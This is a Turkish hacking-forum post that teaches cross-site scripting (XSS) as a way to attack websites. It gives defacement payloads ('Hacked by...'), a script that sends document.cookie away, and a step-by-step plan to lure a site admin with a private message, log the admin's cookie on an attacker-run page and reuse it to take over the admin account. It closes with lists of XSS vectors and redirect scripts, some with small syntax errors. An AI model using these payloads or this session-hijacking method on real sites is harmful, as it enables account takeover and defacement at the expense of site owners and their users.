Nemesis

E-Güven: (0/0)

XSS nedir ?
xss sistemlerdeki script açıklarıdır...
ARama Modullerinde , Profil Panellerinde haber modullerinde shutbox vs.. bulunur..
bu modullere ufak scriptler ekleyerek sitenin yönlenmesini ya da hata vermesini sağlarız..
örn :
http://localhost/hedefdeneme/index.p...be hübele gibi
devam edelim...
Xss Hangi Sistemler Kullanılır..
Xss Genellikle Php-Nuke ya da Php ile yapılmış sistemlere kullanılır
ama Asp’de kullanılmaz anlamına gelmez..
Biraz daha örnekleyerek Anlatalım..
">nedirbu<"font%20size=20>Hacked by oturgaçlı götüreç%20:P</font>
basit bir arama scriptinde kullanılıcak açık..
Yukardaki Xss yi biraz daha açalım .
( $_POST / $_SESSION , $_GET ) Php de arama yaparken verdiğimiz komut budur..
Session’da $username adlı bir değişken var diyelim.Sayfada echo’landığı $_SESSION[’variable’] şeklinde ekrana basılmadığı zaman url üzerinde sayfa.php?username=XSS girdiğimizde oturumdaki kullanıcıyı değil adres satırından gelen variable’ı ekrana basacaktır.
ama xss den verimli sonuç alabilmek için scrtiptin içinde java script çalıştırmak gerekir...
Java Scripti Neden Çalıştırırız :
Cookie Çalmak İçin..
Örnekleyelim..
<script>document.location=’/xss/?’+escape(document.cookie)</script>
Adım Adım XSS için bir method anlatayım..
İlk Önce Sitemize Cookie Çalıcağımız Script Yazılır...
daha Sonra Belirlediğimiz sitenin adminine bir dikkat çekici bir pm atılarak Admin Bizim Belirlediğimiz Siteye Yönlendirilir..
admin’inin Bilgisayarındaki Cookie’inn ayınsından bizim belirtiğimiz adrestedi script tarafından log tutulur..
daha sonra bu cookie burdan alınır bizim bilgisayarımızdaki cookie ile değiştirilir..
taskmanager.exe yi (xp için) kapatılır ve sitenin adresini tekrar yazıp girdiğimizi zaman sitede ki Kullanıcı Adımız : Admin olduğunu tüm yetkilere sahip olduğumuzu görürüz..
Xss Komutları :

<IMG src= "">ascript:alert(’Hacked by ...’);">
<IMG SRC=javascript:alert(’XSS’)>
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

<IMG DYNsrc= "javascript alert Hacked by.."> <BR SIZE="&{alert(’Hacked by...)}">

<IMG src= "vbscript msgboxHacked by.."> <DIV STYLE="background-image: url(javascript:alert(’Hacked by...))">

Sisteme JavaScript Ekleyerek İstediğimiz sayfaya yönlendirmek te Diğer Bir Yöntemdir..
<script language="javascript">
self.location="gidilecek_sayfa.htm"
</script>
<script language="VBscript">
response.redirect""
</script>
<script>
window.location = "";
</script>
<script LANGUAGE="JavaScript">
<!-- Begin
function redirectPage() {
var url640x480 = "";
var url800x600 = "";
var url1024x768 ="";
if ((screen.width == 640) && (screen.height == 480))
window.location.href= url640x480;
else if ((screen.width == 800) && (screen.height == 600))
window.location.href= url800x600;
else if ((screen.width == 1024) && (screen.height == 76)
window.location.href= url1024x768;
else window.location.href= url640x480;
}
// End -->
</script>
<meta http-equiv="Refresh" content="1;URL=http://www.xxx.com/">
<script>
function sayfayi_yenile()
{self.location.refresh()}
self.setTimeOut(’sayfayi_yenile()’,5000)
</script>

<script>
window.setTimeout("location.reload()",10000);
</script>
<script>
location.reload();
</script>

TURKIYEM

E-Güven: (0/0)

__________________